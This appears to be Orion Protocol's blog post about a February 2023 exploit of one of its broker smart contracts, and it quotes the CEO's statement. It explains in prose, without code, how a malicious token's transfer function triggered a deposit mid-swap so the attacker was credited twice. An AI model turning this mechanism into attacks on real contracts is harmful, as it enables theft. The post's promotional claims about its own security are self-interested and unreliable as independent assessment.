Kal Ali | February 3 2023
Kal Ali | February 3 2023
Orion’s industry-first liquidity aggregator was in the news yesterday following an event which occurred because of a temporary issue within one of the smart contracts of Orion’s experimental private brokers, which was exploited. The bug is now fixed and users always have 100% access to their funds.
User funds remain secure and with Orion’s strength being that of decentralization, users naturally keep their funds in their own wallets when connecting to Orion Terminal. Orion as an entity holds no funds, unlike centralized exchanges which store and control a user’s digital assets.
Orion has maintained an exceptional security record for the protocol since going live in 2021, with a top security rating by industry-leading security firm CertiK, following audits of the protocol. Holding firm to those audits, here is the status of the protocol:
- Staking: secure
- Orion Pool: secure
- Bridge: secure
- Liquidity providers: secure
- Depositless trading: secure
If you are already staking or using any of the other areas above, all is well and secure and you need to do nothing more.
Orion’s robust architecture continued to hold up securely across all core areas of the protocol, showing its resilience even under sophisticated attack, showing the strength of Orion’s foundations. The malicious actor targeted a new and experimental area of its code on its private broker side.
This bug is now reviewed, fixed, and will also be subject to a highly detailed audit by top security companies which we will highlight - as will any other similar upgrade to its smart contract code moving forward to match the superb security of the core protocol.
The attack was executed through the pool swap function by swapping between USDC, USDT and ATK – a malicious token deployed by the hacker. The malicious token contained a redefined transfer function, which had been modified to call a deposit function during a complex swap.
In the first step of the complex swap (USDC/ATK) the “transfer” function of the ATK token was called, which in turn called the deposit function of the last token in the complex swap, i.e. USDT.
Because of this USDT deposit, the exchange contract USDT balance was increased by the amount of the deposit.
Due to past contract logic, the amount of this increase was added to the final amount of tokens, that the attacker obtained: they received the number of tokens as a swap outcome, but also the number of deposited tokens, while they were supposed to only have received the number of tokens obtained through the swap as an outcome.
After completion of the pool swap function, the attacker withdrew previously deposited tokens from the exchange contract, thus doubling the amount of their initial deposit.
On a positive note, due to the immediate reaction to this vulnerability, the exploit was not replicated.
Orion acted swiftly in an unfortunate situation by taking concise and calculated steps to identify the issue and make things secure.
Communication in Orion’s official Telegram channel was immediate to assure the community that the team was aware of a situation and were actively reviewing it.
Meanwhile, as Orion’s team, with the help of Chainalysis and PeckShield, thoroughly inspected the issue, only after quality diagnosis and understanding did an accurate follow-up message take place, and within the short space of a few hours, through Orion CEO, Alexey Koloskov.
A Twitter Space also took place with core team members within half an hour of Alexey’s official message, confirming user funds are secure and the solid status of the project.
Here is the account of yesterday via Alexey Koloskov’s Twitter:
”Orion Protocol has enabled CEX liquidity on-chain. This revolutionary technology is the future of DeFi, and we are developing new apps every quarter to maximize the utility of our powerful architecture. 2023 is a year for ripe harvests: what’s due brings ease of CEX trading available on-chain. DeFi for your neighbor is here.
The community has inquired about opening our lucrative broker network to the public for years (it has always been kept private, and funded by our own internal treasury). Although extremely profitable (with one of our many internal brokers generating over $1m in revenue over the course of the year), we chose to keep the broker network private & funded with our own company treasury until we are fully comfortable with releasing the public main net.
We do this for the safety of our community and for the integrity of our work.
We have reasons to believe that the issue was not a result of any shortcomings in our core protocol code, but rather might have been caused by a vulnerability in mixing third-party libraries in one of the smart contracts used by our experimental and private brokers.
This contract was not of significant importance to the public in the sense that it was mainly used by one of our experimental brokers, with our company treasury in the broker’s account balance.
Please rest assured that all users have always, and will always have full access to 100% of their funds.
Moving forward, any and all contracts will be developed in-house to eliminate any potential vulnerabilities from third-party libraries. Our focus is to fortify the Orion Protocol and make sure it remains robust.
Exclusively relying on internal development for our contracts will further minimize any potential exposure to hacks. It’s also important to note that Orion is a TVL light protocol that generates revenue through fees on volume with transient TVL.
This makes it one of the least exposed protocols to large-scale hacks, hence why we fill brokers with our internal funds - even our experimental brokers. In the event that issues occur, our protocol treasury is robust and can handle any incidents without affecting user funds.
We want to reassure our users that no user experienced any loss during this incident. The assets at risk were in internal brokers accounts run by ourselves, the Orion Team, to enable decentralized access to centralized liquidity.
Over the last few years, we have utilized our own funds to fund brokerage accounts. Our brokers use our proprietary Orion Brokerage Software and Orion smart contracts to allow users to trade at the best prices (from Binance, KuCoin, OKX and others) from the comfort of their wallet, without losing custody of their assets. Users’ funds always remain available via smart contracts.
Instead of relying on low-impact bounty programs, our own funds were used in our smart contracts as a way to attract Web3’s most sophisticated hackers. Of course, we always hoped that a vulnerability would not be found.
We have been investigating this very sophisticated attack from the minutes it occurred. We will not reopen the Deposit function until we feel confident that the bug has been fixed, which will only be after successfully passing new audits from leading audit firms.
As always, users can withdraw their funds from the Orion Exchange Contract. However, we have temporarily suspended deposits from this contract until we assure the issue with the experimental broker is rectified. Staking and pools on Orion have not been affected.
Rest assured, users have always, and will always, have exposure to contracts that have been thoroughly battle-tested and deemed secure by our team. We take the security of our protocol and user funds very seriously and will continue to take all necessary measures to ensure their safety.
Orion’s liquidity aggregator technology is an industry first as it combines the top sources of centralized & decentralized liquidity into one decentralized place, with top security as an absolute priority.
Orion continues to make fine improvements every single day.
For an open transparency, the Orion team will be holding a Twitter Space in the next hour to alleviate any concerns you may have and to assure you that a DeFi bump in the road only makes Orion stronger.
Tune in & ask your questions to the team.
ALL user funds are SAFE.”
Improvement is continuous, especially in the rapidly developing industry of blockchain. Orion’s structure is secure and firm as top audits from CertiK have shown.
User funds are also safe.
The attack shows the depth of Orion’s resolve that even with funds taken from a company source which could wipe out smaller projects, Orion can remain heavily stable because of its strong financial and strong technological backing.
This lesson learned here makes Orion even better equipped to stand firm and remain extremely durable now and in the future.
Naturally, the Orion team is placing stringent emphasis on security, both on new and secondary phase experimental contracts and reinforcing the protocol with third-party audits from the most reputable security companies in the business. We won’t just tell you, we will show you.
Orion Protocol is the most advanced liquidity aggregator in the space. We continue to make outstanding and unique technology for your crypto trading journey by making centralized liquidity available to you in a decentralized way in one order book.